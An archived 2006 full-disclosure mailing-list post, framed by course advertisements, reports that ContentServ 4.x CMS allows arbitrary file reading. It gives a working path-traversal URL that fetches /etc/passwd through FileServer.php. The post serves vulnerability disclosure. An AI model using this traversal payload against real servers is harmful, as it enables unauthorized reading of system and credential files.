Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

contentserv 4.x

from [capt . nem0] Network Security [Permanent Link]
Subject: contentserv 4.x
Date: Thu, 30 Nov 2006 18:12:28 +0100 

ContentServ again (still) features remote reading of arbitrary files
====================================================================


ContentServ is a cms and "cross media publishing" software.

Let me quote from their website:

"At ContentServ, there is always something happening. We continously enhance 
our products and services.[...]"

Ok.

Now for the real fun remember:
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0650.html


Still with me? Ok. Lets forget the sql injections for a moment, what if we try: 
http://somesite/contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd

Ooops!


have fun!


ps.: alex...when will you EVER learn?!



-- 
Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen! 
Ideal für Modem und ISDN: http://www.gmx.net/de/go/smartsurfer
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • contentserv 4.x, capt . nem0 <=
Previous by Date:  safely concatenating strings in portable C (Re: GnuPG 1.4 and 2.0 buffer overflow), Solar Designer
Next by Date:  LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability, ajannhwt
Previous by Thread:  Invision Community Blog Mod 1.2.4 .PHP SQL Injection Vulnerability, infection
Next by Thread:  LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability, ajannhwt
Indexes:  [Date] [Thread] [Top] [All Lists]